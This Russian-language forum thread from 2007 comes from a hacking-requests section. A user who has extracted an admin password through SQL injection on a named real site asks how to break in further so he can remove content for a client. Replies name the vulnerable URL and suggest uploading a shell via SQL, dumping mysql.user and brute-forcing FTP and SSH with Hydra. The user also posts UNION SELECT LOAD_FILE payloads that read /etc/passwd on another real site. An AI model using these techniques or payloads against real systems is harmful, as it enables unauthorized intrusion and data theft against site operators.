Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Просьбы о взломах (https://forum.antichat.xyz/forumdisplay.php?f=44)
-   -   Требуется помощь (https://forum.antichat.xyz/showthread.php?t=54473)

Holokost 26.11.2007 16:04
Требуется помощь
 
Есть сайт dezinfo.net
Нашел инъект, раскрутил на админский пасс. Но вот не задача, админка у них не работает (можете проверить dezinfo.net/administrator/). Куда еще копать??? Мне нужно из статьи убрать фото, пренадлежащее заказчику.

TrypoED 26.11.2007 16:09
http://dezinfo.net/login.php - а если зайти под логином админа с этой странички думаешь удалить фото нельзя которое ты хочешь )

Basurman 26.11.2007 16:09
http://dezinfo.net/tests/test_go.php?test_id=10&step=0

Holokost 26.11.2007 16:11
> http://dezinfo.net/login.php - а если зайти под логином админа с этой странички думаешь удалить фото нельзя которое ты хочешь )

На сколько я изучил сайт, залогинившись под админом - нет. Не дает.
> http://dezinfo.net/tests/test_go.php?test_id=10&step=0

Дыра именно тут.

sedoy_xxx 26.11.2007 16:56
попробуй под админским акком зайти по ftp или ssh. У меня иногда прокатывало =)

Holokost 26.11.2007 17:15
К сожалению не прокатывает ни то, ни другое..

sedoy_xxx 26.11.2007 17:21
Пробуй залить через скуль шелл или вытянуть акк админа из mysql.user или почитать файлы (сорри если советы бесполезны ибо баг покрутить времени нет) Так же можешь попробовать гидрой сбрутить пассы от тех же ftp и ssh но палевно получиться.

Holokost 26.11.2007 17:26
Пробуй залить через скуль шелл или вытянуть акк админа из mysql.user или почитать файлы (сорри если советы бесполезны ибо баг покрутить времени нет) Так же можешь попробовать гидрой сбрутить пассы от тех же ftp и ssh но палевно получиться.
Там стоит MySQL 4
Можешь дать ссылку на статью по твоим советам???

sedoy_xxx 26.11.2007 17:33
Всю необходимую инфу ты найдешь поиском по этому форуму. Ищи SQL injection (найдешь отличные статьи) да и по гидре думаю то же что-нибудь будет.

Holokost 26.11.2007 19:18
Еще вопрос:
site.ru/?cat=1%20union%20select%201,LOAD_FILE('/etc/passwd'))/*
Выкидывает с ошибкой
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/psa/home/vhosts/flyfishing.spb.su/httpdocs/index.php on line 201




Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /usr/local/psa/home/vhosts/flyfishing.spb.su/httpdocs/cat.php on line 8

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /usr/local/psa/home/vhosts/flyfishing.spb.su/httpdocs/cat.php on line 23

Но запрос вида
site.ru/?cat=1%20union%20select%201,LOAD_FILE(char(39,47,1 01,116,99,47,112,97,115,115,119,100,39))/*
Ошибок не выдает, но и файл не показывает. Я где то ошибаюсь, или файл нельзя прочесть?


Время: 23:58
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице